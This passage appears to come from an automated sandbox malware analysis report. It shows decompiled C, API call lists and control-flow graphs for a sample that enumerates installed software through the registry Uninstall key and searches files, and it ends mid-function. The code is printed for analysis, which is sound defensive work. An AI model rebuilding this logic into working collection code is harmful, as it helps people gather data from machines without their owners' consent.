                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020119,00000000,74655850,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004095BD
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004095C6
                                                                                                                                                                        • RegEnumKeyExW.KERNEL32(00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000), ref: 00409606
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00020119,000F003F), ref: 0040962A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00409631
                                                                                                                                                                        • RegCloseKey.ADVAPI32(000F003F), ref: 0040963A
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040974E
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00409770
                                                                                                                                                                        • RegEnumKeyExW.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004097AC
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00020019,000F003F), ref: 004097D0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004097D7
                                                                                                                                                                        • RegCloseKey.ADVAPI32(000F003F), ref: 004097E0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpen$FreeLocal$Enumlstrlen$AllocGlobal
                                                                                                                                                                        • String ID: %s %s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                        • API String ID: 3566135887-2725056526
                                                                                                                                                                        • Opcode ID: 4fc523157058bb90ebc2adb6a57775fece7855522a3e6395472df4a88ae19298
                                                                                                                                                                        • Instruction ID: d80988b05da4082da03304b58d54d9122d1b9f20f569912955d0e5abbda793b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 4fc523157058bb90ebc2adb6a57775fece7855522a3e6395472df4a88ae19298
                                                                                                                                                                        • Instruction Fuzzy Hash: 60B16C71A00219BFDB05DFA6DD84EAF7BB9EF49340B104425FA05B7261D7749E10CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1173 40a7da-40a7f9 1175 40abd3-40abd7 1173->1175 1176 40a7ff-40a800 1173->1176 1177 40a801-40a8cd LocalAlloc * 5 call 40a3e4 1176->1177 1187 40a8d3-40a904 call 40a3e4 1177->1187 1188 40aba6-40abca LocalFree * 4 1177->1188 1194 40a90a-40a938 call 40a3e4 1187->1194 1195 40ab7d-40aba4 LocalFree * 4 1187->1195 1189 40abcb LocalFree 1188->1189 1191 40abd1-40abd2 1189->1191 1191->1175 1194->1195 1199 40a93e-40a96f call 40a3e4 1194->1199 1195->1189 1199->1195 1203 40a975-40a9a8 call 40a3e4 1199->1203 1203->1195 1207 40a9ae-40a9bc 1203->1207 1209 40ab32-40ab6e LocalFree * 5 1207->1209 1210 40a9c2-40a9e3 1207->1210 1212 40ab71-40ab75 1209->1212 1215 40a9e9-40aa1d LocalAlloc call 40b177 1210->1215 1216 40ab2b-40ab2c LocalFree 1210->1216 1212->1177 1213 40ab7b 1212->1213 1213->1191 1219 40aa22-40aa29 1215->1219 1216->1209 1220 40ab21 1219->1220 1221 40aa2f-40aab9 call 40a05f call 40a503 call 408619 1219->1221 1222 40ab24-40ab25 LocalFree 1220->1222 1234 40aaf7 1221->1234 1235 40aabb-40aad7 1221->1235 1222->1216 1236 40aafa-40ab1f LocalFree * 4 1234->1236 1235->1236 1238 40aad9-40aaf5 call 407edb 1235->1238 1236->1222 1238->1236
                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                        			E0040A7DA(short* __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				short* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        				void* _t88;
                                                                                                                                                                        				void* _t91;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				void* _t101;
                                                                                                                                                                        				void* _t116;
                                                                                                                                                                        				void* _t120;
                                                                                                                                                                        				void* _t136;
                                                                                                                                                                        				void* _t139;
                                                                                                                                                                        				void* _t141;
                                                                                                                                                                        				void* _t145;
                                                                                                                                                                        				void* _t146;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				void* _t150;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				void* _t162;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				intOrPtr _t164;
                                                                                                                                                                        				char _t206;
                                                                                                                                                                        				void* _t219;
                                                                                                                                                                        				void* _t228;
                                                                                                                                                                        				signed int _t231;
                                                                                                                                                                        				intOrPtr _t232;
                                                                                                                                                                        				void* _t235;
                                                                                                                                                                        				void* _t242;
                                                                                                                                                                        				signed int _t246;
                                                                                                                                                                        				signed int _t249;
                                                                                                                                                                        				void* _t250;
                                                                                                                                                                        				void* _t251;
                                                                                                                                                                        				void* _t253;
                                                                                                                                                                        				void* _t254;
                                                                                                                                                                        
                                                                                                                                                                        				_v48 = __edx;
                                                                                                                                                                        				_v28 = _t164;
                                                                                                                                                                        				_t161 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e2a4);
                                                                                                                                                                        				if(_t161 == 0) {
                                                                                                                                                                        					L24:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t162 = _t161 + 0xa;
                                                                                                                                                                        					_t80 =  *((intOrPtr*)( *0x40e18c))(_t162,  *0x40e1f0);
                                                                                                                                                                        					_t3 = _t80 + 2; // 0x2
                                                                                                                                                                        					_t224 = _t3;
                                                                                                                                                                        					_t81 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
                                                                                                                                                                        					_v36 = _t81;
                                                                                                                                                                        					_t84 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t82); // executed
                                                                                                                                                                        					_v8 = _t84;
                                                                                                                                                                        					_t88 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t86); // executed
                                                                                                                                                                        					_v12 = _t88;
                                                                                                                                                                        					_t91 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t89);
                                                                                                                                                                        					_v16 = _t91;
                                                                                                                                                                        					_t94 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t92);
                                                                                                                                                                        					_v20 = _t94;
                                                                                                                                                                        					_t97 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t95); // executed
                                                                                                                                                                        					_t242 = _t97;
                                                                                                                                                                        					_t100 = _v36 - _t162 >> 1;
                                                                                                                                                                        					_v24 = _t242;
                                                                                                                                                                        					_v44 = _v36 - _t162 >> 1;
                                                                                                                                                                        					_t101 = E0040A3E4(_t162,  &_v8, _t224 - _t162 >> 1, _t100); // executed
                                                                                                                                                                        					if(_t101 == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t228 =  *((intOrPtr*)( *0x40e18c))(_v36 + 2,  *0x40e1e8);
                                                                                                                                                                        					_t246 = _t228 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v12, _v44 + 1, _t246) == 0) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						L22:
                                                                                                                                                                        						L23:
                                                                                                                                                                        						goto L24;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t21 = _t228 + 2; // 0x2
                                                                                                                                                                        					_t116 =  *((intOrPtr*)( *0x40e18c))(_t21,  *0x40e1e8);
                                                                                                                                                                        					_v44 = _t116;
                                                                                                                                                                        					_t23 = _t246 + 1; // 0x1
                                                                                                                                                                        					_t231 = _t116 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v16, _t23, _t231) == 0) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t120 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e1e8);
                                                                                                                                                                        					_v44 = _t120;
                                                                                                                                                                        					_t27 = _t231 + 1; // 0x1
                                                                                                                                                                        					_t249 = _t120 - _t162 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v20, _t27, _t249) == 0) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t232 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e228);
                                                                                                                                                                        					_v56 = _t232;
                                                                                                                                                                        					_t32 = _t249 + 1; // 0x1
                                                                                                                                                                        					if(E0040A3E4(_t162,  &_v24, _t32, _t232 - _t162 >> 1) == 0) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t250 =  *((intOrPtr*)( *0x40e074))(_v12);
                                                                                                                                                                        					if(_t250 > 0) {
                                                                                                                                                                        						_t163 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        						_t136 =  *((intOrPtr*)( *0x40e0c4))(0, _t163, _t250, 0); // executed
                                                                                                                                                                        						if(_t136 != 0) {
                                                                                                                                                                        							_t139 =  *((intOrPtr*)( *0x40e000))(_t163, _t163, _v16);
                                                                                                                                                                        							_v36 = _v36 & 0x00000000;
                                                                                                                                                                        							_t163 = _t139;
                                                                                                                                                                        							_t141 = LocalAlloc(0x40, 0x2000); // executed
                                                                                                                                                                        							_v32 = _t141;
                                                                                                                                                                        							E0040B177(_v8, _t163, _t163, _v20, _v24, _t141,  &_v36); // executed
                                                                                                                                                                        							_t254 = _t254 + 0x14;
                                                                                                                                                                        							if(_v36 <= 0) {
                                                                                                                                                                        								_t251 = _v32;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t145 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t219 = 0x10;
                                                                                                                                                                        								_t147 = E0040A05F(_t145, _t219);
                                                                                                                                                                        								_t253 = _t147;
                                                                                                                                                                        								_v52 = _t253;
                                                                                                                                                                        								_t149 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t146,  *0x40e210), _t253);
                                                                                                                                                                        								_t206 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        								_v60 = _v60 & 0x00000000;
                                                                                                                                                                        								_v64 = _t206;
                                                                                                                                                                        								_v44 = _t149;
                                                                                                                                                                        								_t150 = E00408619( &_v44);
                                                                                                                                                                        								_v40 = _t150;
                                                                                                                                                                        								_t235 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        								if(0 == 0) {
                                                                                                                                                                        									_t251 = _v32;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, _t235, 0, 0, 0);
                                                                                                                                                                        									_t251 = _v32;
                                                                                                                                                                        									if(0 != 0) {
                                                                                                                                                                        										E00407EDB(_v48, _t235, 0, 0, _v36, _t251, _v40,  &_v64);
                                                                                                                                                                        										_t254 = _t254 + 0x18;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_t235);
                                                                                                                                                                        								LocalFree(_v40);
                                                                                                                                                                        								LocalFree(_v44);
                                                                                                                                                                        								LocalFree(_v52);
                                                                                                                                                                        								_t232 = _v56;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t251);
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t163);
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        					LocalFree(_v16);
                                                                                                                                                                        					LocalFree(_v20);
                                                                                                                                                                        					LocalFree(_v24); // executed
                                                                                                                                                                        					_t66 = _t232 + 2; // 0x2
                                                                                                                                                                        					_t161 =  *((intOrPtr*)( *0x40e18c))(_t66,  *0x40e2a4);
                                                                                                                                                                        					if(_t161 != 0) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L23;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				LocalFree(_v8);
                                                                                                                                                                        				LocalFree(_v12);
                                                                                                                                                                        				LocalFree(_v16);
                                                                                                                                                                        				LocalFree(_v20);
                                                                                                                                                                        				LocalFree(_t242);
                                                                                                                                                                        				goto L22;
                                                                                                                                                                        			}






















































                                                                                                                                                                        0x0040a7ec
                                                                                                                                                                        0x0040a7f0
                                                                                                                                                                        0x0040a7f5
                                                                                                                                                                        0x0040a7f9
                                                                                                                                                                        0x0040abd3
                                                                                                                                                                        0x0040abd7
                                                                                                                                                                        0x0040abd7
                                                                                                                                                                        0x0040a801
                                                                                                                                                                        0x0040a80c
                                                                                                                                                                        0x0040a810
                                                                                                                                                                        0x0040a81e
                                                                                                                                                                        0x0040a81e
                                                                                                                                                                        0x0040a822
                                                                                                                                                                        0x0040a833
                                                                                                                                                                        0x0040a83d
                                                                                                                                                                        0x0040a848
                                                                                                                                                                        0x0040a857
                                                                                                                                                                        0x0040a868
                                                                                                                                                                        0x0040a872
                                                                                                                                                                        0x0040a883
                                                                                                                                                                        0x0040a88d
                                                                                                                                                                        0x0040a89e
                                                                                                                                                                        0x0040a8a8
                                                                                                                                                                        0x0040a8aa
                                                                                                                                                                        0x0040a8b8
                                                                                                                                                                        0x0040a8be
                                                                                                                                                                        0x0040a8c1
                                                                                                                                                                        0x0040a8c4
                                                                                                                                                                        0x0040a8cd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a8ee
                                                                                                                                                                        0x0040a8f4
                                                                                                                                                                        0x0040a904
                                                                                                                                                                        0x0040ab7d
                                                                                                                                                                        0x0040ab80
                                                                                                                                                                        0x0040ab89
                                                                                                                                                                        0x0040ab92
                                                                                                                                                                        0x0040ab9b
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x0040abd1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040abd2
                                                                                                                                                                        0x0040a916
                                                                                                                                                                        0x0040a91a
                                                                                                                                                                        0x0040a91e
                                                                                                                                                                        0x0040a923
                                                                                                                                                                        0x0040a926
                                                                                                                                                                        0x0040a938
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a951
                                                                                                                                                                        0x0040a955
                                                                                                                                                                        0x0040a95a
                                                                                                                                                                        0x0040a95d
                                                                                                                                                                        0x0040a96f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a98a
                                                                                                                                                                        0x0040a991
                                                                                                                                                                        0x0040a999
                                                                                                                                                                        0x0040a9a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a9b8
                                                                                                                                                                        0x0040a9bc
                                                                                                                                                                        0x0040a9d7
                                                                                                                                                                        0x0040a9df
                                                                                                                                                                        0x0040a9e3
                                                                                                                                                                        0x0040a9f3
                                                                                                                                                                        0x0040a9f5
                                                                                                                                                                        0x0040a9f9
                                                                                                                                                                        0x0040aa07
                                                                                                                                                                        0x0040aa0c
                                                                                                                                                                        0x0040aa1d
                                                                                                                                                                        0x0040aa22
                                                                                                                                                                        0x0040aa29
                                                                                                                                                                        0x0040ab21
                                                                                                                                                                        0x0040aa2f
                                                                                                                                                                        0x0040aa3c
                                                                                                                                                                        0x0040aa49
                                                                                                                                                                        0x0040aa4d
                                                                                                                                                                        0x0040aa52
                                                                                                                                                                        0x0040aa63
                                                                                                                                                                        0x0040aa66
                                                                                                                                                                        0x0040aa6f
                                                                                                                                                                        0x0040aa74
                                                                                                                                                                        0x0040aa7a
                                                                                                                                                                        0x0040aa7e
                                                                                                                                                                        0x0040aa84
                                                                                                                                                                        0x0040aa87
                                                                                                                                                                        0x0040aa99
                                                                                                                                                                        0x0040aaa4
                                                                                                                                                                        0x0040aab5
                                                                                                                                                                        0x0040aab9
                                                                                                                                                                        0x0040aaf7
                                                                                                                                                                        0x0040aabb
                                                                                                                                                                        0x0040aad0
                                                                                                                                                                        0x0040aad2
                                                                                                                                                                        0x0040aad7
                                                                                                                                                                        0x0040aaed
                                                                                                                                                                        0x0040aaf2
                                                                                                                                                                        0x0040aaf2
                                                                                                                                                                        0x0040aad7
                                                                                                                                                                        0x0040aafb
                                                                                                                                                                        0x0040ab04
                                                                                                                                                                        0x0040ab0d
                                                                                                                                                                        0x0040ab16
                                                                                                                                                                        0x0040ab1c
                                                                                                                                                                        0x0040ab1c
                                                                                                                                                                        0x0040ab25
                                                                                                                                                                        0x0040ab25
                                                                                                                                                                        0x0040ab2c
                                                                                                                                                                        0x0040ab2c
                                                                                                                                                                        0x0040ab35
                                                                                                                                                                        0x0040ab3e
                                                                                                                                                                        0x0040ab47
                                                                                                                                                                        0x0040ab50
                                                                                                                                                                        0x0040ab59
                                                                                                                                                                        0x0040ab6b
                                                                                                                                                                        0x0040ab71
                                                                                                                                                                        0x0040ab75
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ab7b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ab7b
                                                                                                                                                                        0x0040ab75
                                                                                                                                                                        0x0040aba9
                                                                                                                                                                        0x0040abb2
                                                                                                                                                                        0x0040abbb
                                                                                                                                                                        0x0040abc4
                                                                                                                                                                        0x0040abcb
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A83D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A857
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A872
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A88D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A8A8
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00002000), ref: 0040AA07
                                                                                                                                                                          • Part of subcall function 0040B177: FindFirstFileW.KERNEL32(00000000,?), ref: 0040B1D0
                                                                                                                                                                          • Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
                                                                                                                                                                          • Part of subcall function 0040B177: LocalFree.KERNEL32(?), ref: 0040B4D9
                                                                                                                                                                          • Part of subcall function 0040B177: FindClose.KERNEL32(00000000), ref: 0040B4E0
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB25
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                          • Part of subcall function 00408619: LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AAFB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB04
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB0D
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040AB16
                                                                                                                                                                          • Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
                                                                                                                                                                          • Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB2C
                                                                                                                                                                        • LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB35
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB3E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB47
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB50
                                                                                                                                                                        • LocalFree.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB59
                                                                                                                                                                        • LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB80
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB89
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB92
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB9B
                                                                                                                                                                        • LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABA9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABB2
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABBB
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABCB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$Findlstrlen$CloseFileFirstGlobal
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 2830129621-3488577920
                                                                                                                                                                        • Opcode ID: 92e495ebd0955a2c04aae0c3d5226cfc54f8a9186c87c6867fbf46ebbbc436c8
                                                                                                                                                                        • Instruction ID: f9c1c7988c740e23ec6b3556d7cabdce8ac8e299f89005d849d6ceee94cacba7
                                                                                                                                                                        • Opcode Fuzzy Hash: 92e495ebd0955a2c04aae0c3d5226cfc54f8a9186c87c6867fbf46ebbbc436c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 2DC18772900215AFDF089FA6DE45EAE7BB5EF48310F044539F905B72A0DB746D20CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1241 409bd9-409bff 1243 409c01-409c04 1241->1243 1244 409c09-409c1c 1241->1244 1245 409f31-409f34 1243->1245 1247 409c2e-409c58 LocalAlloc call 40a3e4 1244->1247 1248 409c1e-409c24 1244->1248 1253 409c6a-409cae LocalAlloc call 40a3e4 1247->1253 1254 409c5a-409c65 LocalFree 1247->1254 1248->1247 1249 409c26-409c29 1248->1249 1249->1245 1261 409cb0-409cc4 LocalFree * 2 1253->1261 1262 409cc9-409d0b LocalAlloc call 40a3e4 1253->1262 1255 409d94-409d95 1254->1255 1256 409f30 1255->1256 1256->1245 1261->1255 1267 409d2c-409d6c LocalAlloc call 40a3e4 1262->1267 1268 409d0d-409d2a LocalFree * 3 1262->1268 1273 409d9a-409dcd LocalAlloc 1267->1273 1274 409d6e-409d92 LocalFree * 4 1267->1274 1268->1255 1277 409dd3-409de1 1273->1277 1278 409efb-409f2d LocalFree * 6 1273->1278 1274->1255 1277->1278 1280 409de7-409e00 call 4052da 1277->1280 1278->1256 1282 409e05-409e0c 1280->1282 1282->1278 1283 409e12-409e99 call 40a05f call 40a503 call 408619 1282->1283 1295 409ed6 1283->1295 1296 409e9b-409eb6 1283->1296 1297 409ed9-409ef5 LocalFree * 4 1295->1297 1296->1297 1299 409eb8-409ed4 call 407edb 1296->1299 1297->1278 1299->1297
                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                        			E00409BD9(void* __ecx, short* __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				short* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t92;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				char _t116;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				signed int _t193;
                                                                                                                                                                        				signed int _t197;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                        				_t142 = 0;
                                                                                                                                                                        				_v44 = __edx;
